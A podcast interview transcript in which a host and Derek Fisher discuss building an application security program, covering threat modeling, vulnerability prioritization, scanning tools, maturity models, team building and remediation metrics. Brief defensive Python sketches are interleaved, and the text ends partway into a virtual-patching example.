But it’s intended to be kind of lighthearted and in a story format. So it’s not the typical textbook that I think we’re all kind of accustomed to reading. It’s developed for children that are in the 6 to 9, 6 to 10 year old range. They call it middle grade chapter book. So it’s meant for that age range of 6 to 10. And, you know, we look at the way we are in society today and a lot of children of that age are obviously getting their own devices if they’re not using their parents. And so I think it’s important to try to impart some of that security concepts to them as early as possible.

Henry Suryawirawan: Thank you for sharing that. So yeah, you are right. It is always better to have the shift left mentality, right? In the case of the software development life cycle, shift left means the earlier process. But I think you go beyond that, to an earlier phase of life, teaching kids about cybersecurity. I hope they also get it, that these days we all have to be aware of security, and make sure our data and privacy are protected and security best practices are implemented in our day-to-day life, right? Including talking to strangers, sharing our identity, sharing our data, and things like that.

[00:06:56] Building Application Security Program

Henry Suryawirawan: Which brings us to the topic today that we would like to talk about, which is to implement application security program in a particular, for example, company, right? As we all know, application security has been at the forefront. We have seen in the news about security breaches, hacking, and things like that. Maybe if you can give a little bit of background, what is the current urgency for people to start thinking about building application security program within their company?

Derek Fisher: Yeah, I think in the book The Application Security Program Handbook, I talk about how every company is a software company. And whether you’re actually developing software or using software, you know, companies that their core product may not be software, but they’re certainly utilizing it. And so I think that all of us that work in the software space and understand how software gets made, knows that, at the very least, there’s quality issues, if not security issues.

And so these companies that utilize that software will oftentimes collect data from, again, even if their core function isn’t software. They’re collecting data about their clients, about their customers, about their product. They may have IP that they’re trying to maintain. And all of this is being housed and utilized by the software that they bring into their organization. And it’s only getting more complex. When all of these different products talk to each other and integrate with each other and send data to and from each other, there’s opportunity there for weaknesses or vulnerabilities. And so that exposes the organization, exposes the data that they’re housing to malicious activity.

So again, even if your core competency is not software development and if your product isn’t in-house developed software, you still have exposure to this. And it’s critical to understand what are those vulnerabilities and how do you resolve those vulnerabilities when they are detected?

Henry Suryawirawan: Yeah, and I read in one particular chapter, you also mentioned, even though the company seems to have just a little bit of technology, like enabling website or maybe just exposing something to the internet, right? They also have this kind of risk. So that for example, they are being defaced or some data is being leaked out, right? So all this becomes very relevant, even though you may not be a technology pure company. But once you introduce some kind of technology, especially internet, right? So things are becoming more dangerous, so to speak.

You mentioned about building security programs. So maybe for people here who are not yet familiar, because we always think security is somebody else’s job. Maybe if you can explain to us a little bit more what do you mean by building application security program?

Derek Fisher: If you have any familiarity with the security organization within your company, or if you’re already working in a security organization, you’re probably pretty familiar with the fact that we are very good at being able to protect the perimeter. And that’s an old kind of mentality because as things shift to the cloud and as we have more SaaS tools that we’re using where things are kind of decentralized and not housed within a data center. We understand where those entry points are into our system. We understand kind of how the controls around that. But when your core competency is developing software and when your core product is an internally developed software product, it’s on that organization to ensure that we’re building security into that product and protecting the data that we’re collecting and using, in order to protect our clients.

Building an application security program is really about ensuring that security is built into that software development lifecycle. But not just into the software development lifecycle, but also how do we respond to vulnerabilities or findings as we move along that development pipeline all the way into the operational environment. So when you develop software and you push it out into a production environment. For development that’s not where it ends, right? There’s a constant iteration. You’re constantly getting feedback from your clients. You have defects that you have to resolve and so forth. And those get pulled into the next set of requirements and development.

And security’s no different when we find vulnerabilities in operations or if we find new zero days or so forth, those things need to be pulled back into the development environment and resolved. So having a program in place that is able to really look at that entire software development life cycle and integrate security as part of that entire cycle, is what building an application security program is all about.

Henry Suryawirawan: Yeah, so I think I do get what you mean by saying traditionally we always try to protect the perimeter, right? Whether it’s in versus the out, right. And maybe it worked last time, but I guess these days, security threats have become much more sophisticated. Not to mention there might be also insider security threats. But I think these days there are so many entry points where security vulnerabilities can be found. And even if you don’t do anything, sometimes it could also happen that security vulnerabilities are being exposed. Think of like the Log4j vulnerability last time, right? Even though you didn’t change anything, you’re still exposed once this vulnerability is found.

[00:11:58] Shifting Left

Henry Suryawirawan: Which brings us to the phrase that we commonly hear in the security world and also software development world is that, you quoted this in the book saying that fixing issues in production is significantly more expensive than fixing prior to production. So this comes back to our discussion earlier about shifting left, right? Maybe if you can explain a little bit more about this philosophy. What does it mean by shifting left? And why do we always have to care about fixing it earlier than the production?

Derek Fisher: Today, if you look at discovering a vulnerability in the production environment, there’s a long path. I mean, I say long, and that could be relative depending on the organization and what type of release methodology that they’re in. But there’s a path from the code being developed on a development environment, and then all the way to production. And there’s tools, there’s people, there’s processes that are all in place along that entire pipeline. And that can involve QA individuals. There could be Scrum masters, project managers, leadership that are all involved in the process of getting that code from a development environment into production. And that’s real cost, right?

If you think of, we’re looking at code going from development to production. But think about it, a vulnerability going from development environment into production. And all along that pipeline, there’s been people that have been involved with that code, that is potentially vulnerable going along until it gets into that production environment. Then when it’s discovered in production, you now have support individuals that have to get on bridge calls to figure out what the issue is. Security people are called in. You might have to get pulled in incident response, forensics. Depending on the severity of the vulnerability, you now have a very costly vulnerability.

Now, of course, results may vary. You may find a vulnerability in production that’s relatively easy to resolve or get to a good spot with. And you may have ones that are very extreme right? But the goal of shifting left and the goal of being able to push the discovery of that vulnerability earlier in the process is really about bringing security and detection as early into the process as possible. And the way we do that is through training developers to, number one, not release security vulnerabilities in the first place, or at least be able to understand the code, patterns that result in secure software.

Additionally, try to layer in security scanning tools as early as possible. So that could be things like static analysis software, or what we call SCA or software composition analysis to look for those vulnerabilities as early in the process as possible. Things like secrets management, secrets discovery tools. All these can be kind of used early in the process to detect any potential security issues that could manifest in a production environment. And then all along that pipeline you can also integrate other scanning tools that are designed for runtime environments like dynamic scanners or integrated software testing. So the goal there is to just continue to implement security tools along that path to discover those vulnerabilities before they get to a production environment. And there’s many different ways of doing that.

Now, not to kind of step on the term shift left here, but we’re starting to move away as application security individuals, we’re starting to move away from the term shift left. Just because, not that we don’t want to focus on discovering those vulnerabilities early, but we don’t want to forget that there’s other methods of detecting vulnerabilities and ensuring that security is integrated across the entire life cycle. Because, I think we’re now trying to kind of overcorrect for the term shift left and pushing everything into the left hand side of the development life cycle, and sometimes forgetting about the rest of it.

Henry Suryawirawan: Yeah, you made a good point, right? Security is not finished just by having so-called secure code and secure development practices, right? Once you put the code into production, that’s where the rubber hits the road, so to speak there, where you have attackers maybe constantly trying to look for vulnerabilities or things where they can attack.

And I think I even see it within my company from day to day. There are just some anomalies in traffic, like attempts to attack by injection or by other means, right? And there are so many security scanning tools as well, like hacking tools that people can get hold of easily, so they can use free software to scan any kind of internet port, website, and things like that. So I think you are right that we should not relax once we adopt secure coding practices and development pipeline practices, but always try to look at it holistically.

[00:16:30] CIA Triad

Henry Suryawirawan: Before we actually go into all these techniques that you implement in the program, right? One thing is for people to understand the risk, and normally the risk associated with security is summarized as a CIA triad, this thing about Confidentiality, Integrity, and Availability. So can you also explain to us what this CIA triad is and can all security risks actually be summarized into these three components only?

Derek Fisher: I mean, it’s not just those three components. There are other acronyms that leverage the CIA to also include things like authentication, accountability. But when you look at what we do from a security standpoint, it does pretty much come back to ensuring that data is secure and not exposed to somebody that shouldn’t be. That the data is not corrupted and is known to be trusted. And that data is available. And I say data, but the application, the system, it’s confidential. The data in there is confidential. The data and the systems are running the way they should be. And that there hasn’t been anything tampered with the system.

When you look at the CIA, a lot of it comes back to those three kind of main principles. And when we talk about the different ways of trying to integrate security to ensure that we’re maintaining the confidentiality, integrity and availability. Just from a high level, with confidentiality, primarily we’re talking about encryption. Making sure that data is encrypted at rest, in transit, and in use. With integrity, we’re ensuring that we have hashing and checksums being used just to ensure that the data that was sent is the same data that was received. And with availability, you’re building highly redundant, highly available types of systems to ensure that when something is needed, it’s available.

I used to work in the healthcare space, and I think the CIA was definitely, I think more prominent in the healthcare space than I would say in some of the other fields that I’ve worked in. Not that it’s not elsewhere, but definitely when you talk about using clinical applications that doctors are using to make decisions on patients, potentially life and death type of situations. You wanna make sure that that prescription, that the medication that the doctor is prescribing is what the doctor prescribed, is what’s actually being administered. In operating room, you wanna make sure that the systems are up and running so that the doctor can get access to that information when they need it. And you wanna make sure that patient data is well protected and not released. Again, in other fields, obviously the CIA is still critical. But it was very abundantly clear when I worked in the healthcare space how critical the CIA was.

[00:19:04] Threat Modeling

Henry Suryawirawan: Thanks for explaining that. So now assuming that people understand security risk and you know why it is wise to actually implement some kind of security program. Where do people start? I think in your book you mentioned about this thing called threat modeling as the first step. So maybe if you can explain also what does it mean to do threat modeling and what does it entail?

Derek Fisher: Yeah, there’s a couple different ways of doing threat modeling. And I think that we do threat modeling on a daily basis whether we know it or not. We get in our car and we start driving and our mind is already doing, whether we consciously think about it or not, we’re doing threat modeling. You know, am I going the right direction? Is there gonna be traffic? Is this person gonna stop at this stop sign that I’m about to go through? And you build in certain mitigations and you determine like whether you’re doing the right thing.

On a basic level, threat modeling is essentially asking what can go wrong. There’s a lot of formal processes around threat modeling, including using tools to do threat models. But it ultimately comes down to asking that basic question, what can go wrong? And once you identify what that wrong is, you start developing those mitigations and remediation efforts. But if you want to get started with threat modeling, there’s a couple different tools that I usually recommend. One is the Microsoft Threat Modeling Tool, which is free to download. OWASP also has one called Threat Dragon, which is also a threat model tool, purpose-built for designing threat models. Other individuals and organizations will use things like PowerPoint or Visio or something like that.

Just because, essentially, when you’re doing a threat model is that you’re drawing out the architecture of the system. And you wanna understand what the different touchpoints are in that system, whether they’re third party integrations, or whether they’re internal users or external users. You wanna know basically what that attack surface looks like for that system. And then start asking those questions on each one of those integration points. Ask the question, what can go wrong? Can somebody spoof this call? Can somebody tamper with the data that’s coming through? Can someone perform a denial of service? Can someone change their access level from a simple user to an admin user?

And you go through that with each one of those interactions with the system. And as you do that and identify like, oh yeah, well, somebody can perform a denial service. Well, is this high enough risk for us to integrate a highly available system? For us to be able to mitigate or remediate that denial of service attack. And so that’s the basic process of threat modeling is, designing that architecture, identifying the interaction points, and start asking those questions about what are the different attacks that could be performed, and then what are we gonna do about that?

Now there’s also a more, what we would call like a manual threat model process, which is essentially getting a bunch of individuals into a room with a whiteboard and doing the same thing, where you draw out the architecture, you start asking those questions. But the tools, using something like OWASP Threat Dragon or Microsoft Threat Model tool. Or there’s commercial off the shelf threat model tools as well that exist. But using any of those tools means that an individual or a very small group of individuals can work on that threat model. You can put into, maybe a central location where you can store those threat models, their digital format. So they’re easy to maintain and hand out. That’s the benefit of using a tool for threat modeling.

But when you look at doing a manual threat model on a whiteboard, it’s more time consuming. You can’t really take your whiteboard and check it into a repository somewhere. But you’re gonna tend to get better results in those manual type of threat model environments, cause you’re gonna get more collaborative responses from the people that are in that conversation. But it doesn’t scale as well. So, you know, there’s some trade offs, but, again, it all comes down to asking that question, what can go wrong and what are we gonna do about it?

[00:22:49] Threat Classification

Henry Suryawirawan: Thanks for explaining about threat modeling. So for people who haven’t done this before, how frequent should they do this kind of exercise? Is it like every time there’s a new thing in the architecture? Or is it like a periodic thing, like maybe every quarter, every month? Is there some kind of advice that you wanna give people when they should do threat modeling? And after we collect all these threat modeling findings, how should people collect and prioritize this and also explaining to the whole company or maybe the management that, okay, some of these are real risk that we should work on?

Derek Fisher: Yeah. It comes down to understanding what the risk level or risk tolerance of the organization is. And that’s a very key component that I think we’re missing in many companies: how do you really know what the risk is of the findings that you find in your software? We don’t always do a good job of that. If you’re working inside of an organization, you generally know what your flagship products are, you know where your crown jewels are in terms of data, you know what the critical workflows are, and you can determine, okay, well, this vulnerability that we found impacts this application, it has potential to compromise this data that’s high risk, so we should tackle that.

However, again, we’re not great at being able to make that decision quickly and in a very calculated way. It tends to be individuals making, I don’t wanna say gut reactions, but it sort of is. People saying, oh, this is our flagship product with a lot of sensitive data, therefore it’s gotta be high risk.

But risk really comes down to technical risk and business risk. There’s the technical risk of: are we gonna lose the confidentiality or integrity of the data, or the availability of the system? And then from the business side: do we have compliance concerns? Do we have contractual concerns? Do we have dollar amounts assigned to downtime for this application? Marrying those two together really gives you the overall risk of what that vulnerability might be in the context of that application. So I think we’re missing that context in a lot of organizations, in terms of how we frame the vulnerabilities that we find. How do we frame them into the right context so that we know what we’re tackling? Because prioritization, and really understanding how we prioritize the vulnerabilities that come in, needs to be put through that lens of risk.

But the other side of that, from a technical standpoint, is what’s the exploitability of this vulnerability? And that’s another piece that we’re not, as an industry, great at getting to. Application security teams can find vulnerabilities all day. Penetration testers can find vulnerabilities all day too. We have no shortage of ability to find vulnerabilities and to say, hey, I found 10 new vulnerabilities today. Great! What are we gonna do about it? Are these really actual issues that we need to be concerned about? Are they gonna actually go into a production environment? If they go into that production environment, are they actually going to be exploited?

Because in any mature organization, you’re gonna have runtime protection, you’re gonna have segmentation, you’re gonna have all these other controls in place that may make that vulnerability unexploitable. So understanding how to prioritize vulnerabilities and how to really contextualize them is not easy. It’s understanding what the organization’s risk is, what the exploitability of that vulnerability is, putting that together, and making a decision quickly. Then you find one where, hey, this vulnerability here is in a very high risk application, it has potential to expose a lot of data, which is gonna put us at compliance risk, and yes, it is exploitable because we have no mitigations in front of it.

That should be, I don’t wanna say a slam dunk, but I think that’s typically a slam dunk for organizations to say, hey, that’s the one we need to go after, not the other 50 that we found that are unexploitable. And I think for most organizations, that’s the point to get to: being able to show, hey, here’s a valid vulnerability that really is going to be impactful. That’s what they wanna chase. They don’t wanna chase the other 50 that are just not a concern.
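As a rough illustration of marrying technical risk, business risk, exploitability, and mitigations into one prioritization decision, here is a minimal sketch. The scoring scheme and field names are assumptions for illustration only, not a standard model like CVSS, and the findings are invented examples.

```python
# Rough sketch of prioritizing findings by combining technical risk, business risk,
# and exploitability. The scoring scheme is an assumption for illustration only.

from dataclasses import dataclass

@dataclass
class Finding:
    name: str
    technical_impact: int   # 1-5: loss of confidentiality/integrity/availability
    business_impact: int    # 1-5: compliance, contractual, downtime cost
    exploitable: bool       # is it actually reachable in production?
    mitigated: bool         # runtime protection, segmentation, etc. in front of it

def priority(f: Finding) -> int:
    """Higher score = tackle first. Unexploitable or mitigated findings drop to the bottom."""
    if not f.exploitable or f.mitigated:
        return 0
    return f.technical_impact * f.business_impact

findings = [
    Finding("SQL injection in flagship app", 5, 5, exploitable=True, mitigated=False),
    Finding("Outdated library in internal tool", 3, 1, exploitable=False, mitigated=False),
    Finding("XSS behind a WAF rule", 4, 3, exploitable=True, mitigated=True),
]

for f in sorted(findings, key=priority, reverse=True):
    print(f"{priority(f):>2}  {f.name}")
```

The design point is simply that exploitability and existing mitigations gate the score, so the one reachable, high-impact finding floats to the top instead of the other 50 that are noise.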

[00:27:04] Starting Application Security Program

Henry Suryawirawan: And you’re right, we can always find vulnerabilities. But what do we do about them? Because sometimes they could number in the hundreds or thousands, depending on what tools you integrate. And speaking about tools, you earlier mentioned things like dynamic application security testing, static analysis, and software composition analysis. What other things could a company or organization introduce within their security program, apart from those you have mentioned?

And where should people start? Because there are so many options, I don’t think any new company can easily introduce all of them. So where should people prioritize? Maybe start with the easiest ones first, or maybe the most impactful ones? Maybe you can give us some guidance here.

Derek Fisher: Securing the development life cycle can be done a hundred different ways. And there can be any combination of tools. And I know talking to some of my peers and looking at others in the industry, you can see where some are doing things that are completely different, and some are doing things that are very similar to what I’m doing at my company. And I think it really comes down to a few things.

One is, what’s the budget tolerance? You know, if you’re on a shoestring budget and you don’t have a lot of cash to just throw at a problem, then you have to be creative. If you are less constrained in that area, then you have a little bit more leeway in being able to build a more robust security development program. But at some point, finding more vulnerabilities isn’t making you more secure. In fact, you’re not gonna get invited to the Christmas party and stuff like that, because all you’re doing is finding more vulnerabilities and making everybody angry. So I think at some point, you have to go for quality over quantity.

And you know with all that being said, I think it really does depend on the organization. What is the business budget tolerance? And what is your risk as an organization? If you’re a company that has no sensitive data, you are not processing credit cards, you’re not holding client data, there’s no sensitive information, you’re not gonna want to integrate all the security tools that Gartner puts out there and layer ‘em all into your development pipeline. You’re gonna be a little bit more measured in that sense. But if you’re a large organization with high risk data, high risk workflows, then yeah, you’re gonna have a little different context.

But the way I usually try to approach it is: think about what you are trying to discover. If you’re looking to discover vulnerabilities, the way to start is with those runtime type of tools, so DAST or IAST. The other thing is to get a penetration test. If you’re going to use a third party, that’s fine. If you have people in-house that can do it, that’s great. But you wanna find out what your surface vulnerabilities are that you need to be concerned about, the ones that would actually show up in an environment. And those tools, DAST and IAST, and a penetration testing engagement will help you get that information relatively quickly. But there are concerns around scope. Like, did we get everything in the application? Are there any hidden corners that didn’t get caught by the scans?

And then SCA, software composition analysis. To me, it should always be integrated. It’s very low friction and usually low cost. There are open source tools out there that can help you. You can even build your own based on open APIs, like access to the NVD (National Vulnerability Database), to basically look at your libraries and understand which of them have known vulnerabilities that need to be replaced. That, again, to me is just low hanging fruit. Set aside the code that we’re developing; the code that we’re pulling from repositories and third parties, is that vulnerable? Tools like SCA will certainly help with that. So I think getting the surface level vulnerabilities and getting the vulnerabilities that exist in the libraries that you’re using are core application security planks, I would say, in terms of building a program.
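As a sketch of the “build your own on top of open APIs” idea, the snippet below asks the NVD for CVEs whose descriptions mention a library name. It assumes the NVD CVE API 2.0 endpoint and its keywordSearch parameter, plus the requests library; a real SCA tool would match precise package coordinates (CPEs or package URLs) and versions rather than free-text keywords.

```python
# Minimal sketch of a do-it-yourself SCA check against the NVD.
# Assumes the NVD CVE API 2.0 endpoint and its keywordSearch parameter; a production
# tool would match exact package coordinates and versions, not free-text keywords.

import requests

NVD_API = "https://services.nvd.nist.gov/rest/json/cves/2.0"

def known_cves(library_name: str, limit: int = 5):
    """Return a few (CVE ID, short description) pairs whose text mentions the library name."""
    resp = requests.get(
        NVD_API,
        params={"keywordSearch": library_name, "resultsPerPage": limit},
        timeout=30,
    )
    resp.raise_for_status()
    results = []
    for item in resp.json().get("vulnerabilities", []):
        cve = item["cve"]
        description = next(
            (d["value"] for d in cve.get("descriptions", []) if d.get("lang") == "en"), ""
        )
        results.append((cve["id"], description[:100]))
    return results

if __name__ == "__main__":
    # Hypothetical dependency names pulled from a manifest or lock file.
    for lib in ["log4j", "openssl"]:
        for cve_id, summary in known_cves(lib):
            print(f"{lib}: {cve_id} - {summary}")
```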

And then you start turning the screws a little bit and look at static analysis, cause those tools tend to be noisy and they tend to turn out a lot of vulnerabilities. But you can integrate them in the development environment. And if you have it properly tuned, if you’re using a good tool, and if you have smart engineers and smart application security individuals, then you can get some value out of those and try to head off things before they go into a production environment.
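One hedged way to picture “properly tuned” is a simple CI gate that only fails the build on unsuppressed high-severity static analysis findings. The findings.json shape and the severity threshold below are assumptions; the parsing would need to be adapted to whatever report your SAST tool actually emits (for example, SARIF).

```python
# Sketch of a CI gate on static analysis output. The findings.json format and the
# blocking severities are assumptions; adapt to your SAST tool's real report format.

import json
import sys

BLOCKING_SEVERITIES = {"critical", "high"}   # tune this so the gate isn't just noise

def should_fail(findings_path: str) -> bool:
    with open(findings_path) as f:
        # Assumed shape: a list of {"rule": ..., "severity": ..., "suppressed": ...}
        findings = json.load(f)
    blocking = [
        item for item in findings
        if item.get("severity", "").lower() in BLOCKING_SEVERITIES
        and not item.get("suppressed", False)
    ]
    for item in blocking:
        print(f"BLOCKING: {item.get('rule')} ({item.get('severity')})")
    return bool(blocking)

if __name__ == "__main__":
    # Usage: python sast_gate.py findings.json
    sys.exit(1 if should_fail(sys.argv[1]) else 0)
```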

Additionally, start looking at your security training program and making sure that engineers are getting the security training that will help them, again, stop adding those vulnerabilities. And the last thing I would say is a security champions program. Firing up a champions program is really a sign of a mature application security program, because that’s usually the point where the tools are integrated, you’re getting the vulnerabilities, and now you need additional help in trying to resolve them. That’s where a champions team comes in.

Henry Suryawirawan: Yeah. Speaking about SCA, software composition analysis, I just want to highlight that these days we all use a lot of software that is open source or free to download. And it’s not just libraries or frameworks; sometimes it’s also container images, VM images, and things like that. There are so many things that people have built. I’m not saying that open source is not secure. But there are always points where hackers might include some kind of malicious software inside those open source tools. And hence having this SCA is actually very important.

And I think I’ve heard people quote that of the software you write in an organization, maybe more than half of it actually comes from these open source and third party libraries. So that is the potential risk you are assuming if you use a lot of open source software tools. That’s a lot of attack surface.

[00:32:45] Security Program Maturity Model

Henry Suryawirawan: And speaking about maturity, which you mentioned just now. When we talk about maturity, it always comes back to a maturity model. Is there something like a maturity model for implementing a security program within an organization?

Derek Fisher: Yeah, there are. BSIMM and SAMM are the two that probably come to mind for most people. And they’re two different ways of looking at a maturity model. BSIMM – Building Security In Maturity Model is what BSIMM stands for – looks at other organizations, does basically an assessment of each organization, and says, here’s where this organization is from a maturity standpoint. And you, as your organization, can then look at that and say, well, where are we at? It’s essentially measuring yourself up against your peers and understanding, okay, what are the other organizations of my size in my industry doing? What are the one, two, or three things that everybody in this category is doing? Am I doing those things? So that’s a good way of looking at, okay, are we doing the things that our peers are doing.

With OWASP SAMM, that’s more of a classic maturity model where, okay, here’s the level that you’re starting at, here are the things you need to do to get to level one, then here are the things you need to do to get to level two, and so forth. And the goal there is to really look at those steps in the maturity model and have targets for where you want to be.

You may not have to be at the highest level of maturity. Again, it goes back to understanding what your organization does. If you’re not processing credit cards, if you’re not holding clients’ sensitive data, and you’re not a critical app, you don’t need to be at the highest level. Maybe level one or level two is just fine. But what it does is allow you to say: if we want to get to level two, here are the things we need to do. You build out a roadmap that says, here are the steps we’re gonna take to get to that level, and here’s the timeline we’re gonna follow to get there.
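As a toy illustration of turning maturity targets into a roadmap, the sketch below compares current and target levels per practice and lists the gaps. The practice names and levels are made-up placeholders, not the actual OWASP SAMM business functions or practices.

```python
# Toy sketch of turning maturity targets into a gap list, in the spirit of the SAMM
# discussion. The practice names and levels are made-up examples, not real SAMM practices.

current = {"threat modeling": 0, "security testing": 1, "training": 1, "incident response": 2}
target  = {"threat modeling": 1, "security testing": 2, "training": 1, "incident response": 2}

def roadmap(current_levels, target_levels):
    """Return the practices where the target level exceeds the current level."""
    return {
        practice: (current_levels.get(practice, 0), level)
        for practice, level in target_levels.items()
        if level > current_levels.get(practice, 0)
    }

for practice, (now, goal) in roadmap(current, target).items():
    print(f"{practice}: level {now} -> level {goal}")
```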

Personally, I have the Derek Maturity Model, so it’s a little different. I think BSIMM is more valuable to me than SAMM. And the reason is that I wanna know what the other organizations are doing. Are we in line with that? But sometimes just having conversations with your peers is just as relevant. When I’ve had conversations with peers, trying to see what they’re doing compared to what I’m doing, we’ll kind of exchange notes. And you get that sense of, hey, okay, we’re doing mostly well, but at the same time, we have the same challenges trying to figure out how we deal with the vulnerabilities that we detect and so forth. So just having those conversations with your peers is, I think, just as helpful.

Henry Suryawirawan: I like the Derek Maturity Model. So yeah, even just speaking at conferences, networking, or talking with peers, I think you can also find insights into what kind of security practices you should include.

[00:35:27] Building Security Teams

Henry Suryawirawan: And speaking about building this program, obviously we need people. But like I mentioned in the beginning, sometimes the mindset is that we always assume security is somebody else’s problem, in this case, the application security team’s. In your experience, how should people go about hiring this application security team, and what’s the right team size or ratio? From my experience as well, hiring good security engineers is really, really tough. It’s not just that they are highly in demand; the supply is also not that big. So how would you go about building these security teams? How do we find good security engineers, and how do we scale this within the organization?

Derek Fisher: I think the first thing to realize is you’re never gonna scale to what you need. Don’t even bother. It’s not possible. I’ve had very large teams. I’ve had very small teams. My team right now, I would say is relatively large compared to what I’ve had in the past. And anybody that follows me or has heard me on other conversations, I’ll say it again. Like, I could double the size of my team and it probably still wouldn’t be sufficient. And a lot of it is because application security is very different than security operations centers, very different than network security, and so forth.

The way I always describe it is, application security teams are the sidecar to engineering. We are the ones that have to be part of that development process to ensure that security is integrated. Now that doesn’t mean it has to be an individual. And if it is an individual, it doesn’t have to be an application security individual, which is why things like champions programs or security education programs are very helpful in the sense that you’re helping to drive security education across the engineering organization.

But if you are tasked with building an application security team, it comes down to asking the question: what do we want to do? Do we want to just be a team of penetration testers? Do we want to be a team of engineers that are working with the developers in engineering and helping them create secure code? Do we just wanna integrate tools and not do anything other than integrate tools, find vulnerabilities, and tell somebody, go fix ‘em? So it really comes down to understanding what your organization is going to tolerate and what the actual needs for the team are.

So every organization’s gonna have a different view on that. And it really comes down to understanding what the budget tolerance is, what the need from an organization perspective is, and what the roadmap for the application security team is. Is it, again, just integrating tools and finding vulnerabilities? Do we wanna get more proactive in terms of blue teaming, purple teaming, and red teaming to discover those vulnerabilities? Or are we just gonna stick to architecture and design?

So there’s a lot of different ways of tackling that. But again, I go back to my first comment: being able to hire the “right size” in terms of individuals, you’re not gonna do it. And I don’t recall the numbers off the top of my head, but I know BSIMM had some numbers around what the right size is. But again, it varies. It could be that for every hundred engineers you have one AppSec person, or for every 50 you have one. It really depends on the organization.

But when it comes down to hiring, one of the things that I typically look for is somebody that has some type of development background. Because if you can’t speak the language with the development team, then you’re already at a disadvantage. Not that you can’t be in application security otherwise, cause obviously we have plenty of people in application security that didn’t come out of development. But it’s certainly helpful to have those individuals on your team to really translate the vulnerabilities that come out of these tools and penetration tests, and go back to the development team and say, “Looking at your code, here’s exactly what the problem is and here’s exactly how you can resolve it.”

I think that goes a long way, not just in making the organization more secure and making the application more secure, but also building that relationship between the development team and the application security team where we both understand each other, therefore we’re on somewhat common ground there. So I do typically look for people that have either come out of the development space or have some type of a development background.

Henry Suryawirawan: I agree with your opinion that we should hire security engineers with some development background. What I typically find in the industry is that there are so many so-called security experts, but they mainly specialize in tools. Like, I’m a specialist in these tools, I know how to implement and use them, but they don’t necessarily go back into the development life cycle and advise developers, okay, you should not do this. Or even look at the code to see how things should be prevented in the first place.

So I think, yeah, having this kind of development background will, first of all, like you mentioned, build a good relationship. But obviously, if we can prevent security issues in the earlier phases, again coming back to shift left, I think that makes a lot more impact.

[00:40:19] Measuring the Program’s Success

Henry Suryawirawan: So speaking about doing this security program, building some kind of roadmap, and understanding what we want out of this security team: once we have established this security team, what could be a good indicator of success? What are the measurements of success? How should you evaluate it? Is it just the number of findings, or the number of security breaches and incidents? Or is there any other measurement that you advise people to look at for measuring success?

Derek Fisher: Yeah, I think there are two main ones that I would focus on. One is the downward trend in vulnerabilities, not upward. Again, we have no problem finding vulnerabilities. We can find them all day, every day. But are we moving the needle and reducing that backlog? That to me is a better indicator of a security program: we’re reducing that backlog, not adding to it. And to be honest, there have been times where we’ve had scans or tests done, and there weren’t any vulnerabilities found. And all of us that work in the security space are like, “Nah, I call BS on that. There’s no way.” And you kind of second guess yourself, where it’s like, “Wait, that can’t be right. There’s gotta be something.”

And after seeing several of those, I’m starting to come around to the idea that, hey, maybe the program’s working. Maybe we’re actually stopping these things from going out, and that’s a good thing. But like I said, all of us in the security space, when we see a scan that comes back with no results, immediately go, wait a minute, that can’t be right. But as long as you can validate that, no, this is right, I think that’s a good indication that the program’s working. We’re not finding things as much. We’re not adding to the backlog. We’re reducing it.

I think the other thing is something I’ll steal from the operational space: mean time to remediation. How quickly are we resolving those vulnerabilities? Do we have vulnerabilities that are sitting out there for weeks, months, maybe even years? If that’s the case, that’s a problem. And there are a couple things with that, especially with very long lasting vulnerabilities, past several months or even a year or more. You have to ask the question, is this even still a valid issue? If something’s been out there that long, there’s something not right there.

But I think looking at the amount of time it takes to actually remediate a vulnerability is also a critical indicator of how successful the program is. Because, again, we can find vulnerabilities all day. But if a critical vulnerability is found and we’re able to remediate it within a few hours or a day or two, that’s a very strong indicator that your program is humming along the way it should.
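As a small sketch of those two indicators, the backlog trend and mean time to remediation, the snippet below computes both from a hypothetical list of findings with opened and closed dates. In practice this data would come from a vulnerability management or ticketing system rather than a hard-coded list.

```python
# Sketch of the two success indicators discussed: backlog trend and mean time to
# remediation (MTTR). The findings list and its fields are hypothetical examples.

from datetime import date

findings = [
    {"opened": date(2023, 1, 10), "closed": date(2023, 1, 12)},   # remediated in 2 days
    {"opened": date(2023, 2, 1),  "closed": date(2023, 4, 15)},   # remediated in 73 days
    {"opened": date(2023, 4, 20), "closed": None},                # still open
]

def open_backlog(items, as_of: date) -> int:
    """Count findings opened on or before `as_of` that were not yet closed at that date."""
    return sum(
        1 for f in items
        if f["opened"] <= as_of and (f["closed"] is None or f["closed"] > as_of)
    )

def mean_time_to_remediation_days(items) -> float:
    """Average days from opened to closed, over remediated findings only."""
    closed = [(f["closed"] - f["opened"]).days for f in items if f["closed"] is not None]
    return sum(closed) / len(closed) if closed else float("nan")

print("Backlog at end of Q1:", open_backlog(findings, date(2023, 3, 31)))
print("Backlog at end of Q2:", open_backlog(findings, date(2023, 6, 30)))
print("MTTR (days):", mean_time_to_remediation_days(findings))
```

Tracking the backlog count over successive dates gives the trend line; a falling backlog alongside a short MTTR is the signal the program is working.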

[00:42:48] Zero Day Vulnerabilities

Henry Suryawirawan: Yeah. Speaking about remediation, I think the ultimate thing would be zero day vulnerabilities, whenever they are found, and how long it takes for the organization to actually take action. Maybe in your opinion, since you are in this security space a lot more, how should people build this kind of zero day capability?

Derek Fisher: Yeah. And I think that comes down to that mean time to remediation, right? I’ll go back to the SCA example, the software composition one. We can develop software and have zero vulnerabilities when that software goes out into production. The next day, some component that we pulled in from a repository could be vulnerable, whether it’s a zero day or an identified public vulnerability. Either way it’s vulnerable, right? And you did everything right. Time will result in vulnerabilities being found.

And so it really comes down to having a process in place to take those vulnerabilities that have been discovered in a production environment and get a remediation out the door in a short period of time. That goes back to that mean time to remediation: if we find an issue in production and we’re able to get a remediation pushed to production in a very short period of time, which could be hours, could be days, could be a week or so, then great. That means your program is, again, doing very well.

Something that we didn’t really touch on, and it’s not because I was ignoring it, is runtime protection. There are tools out there, whether it’s a WAF (Web Application Firewall) or Runtime Application Self-Protection. Those also go a long way in providing some cover for a period of time until you can get that remediation out the door. So there are a lot of levers we can pull from a security perspective to ensure that we are providing that protection, especially against things like zero days, where something like runtime protection does come into play. Because it allows you to do virtual patching, and it allows you to potentially stop any malicious activity until you get code out the door.
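To illustrate the virtual patching idea, here is a minimal sketch of a WSGI middleware that rejects requests matching a known exploit signature until the real code fix ships. The signature and demo app are placeholders, and an actual WAF or RASP product does far more than this (parsing, normalization, managed rule sets, and so on).

```python
# Minimal illustration of "virtual patching": block a known exploit pattern at runtime
# until the real code fix ships. The signature and app below are placeholders; an actual
# WAF or RASP does far more than a single regex check on the query string.

import re
from wsgiref.simple_server import make_server

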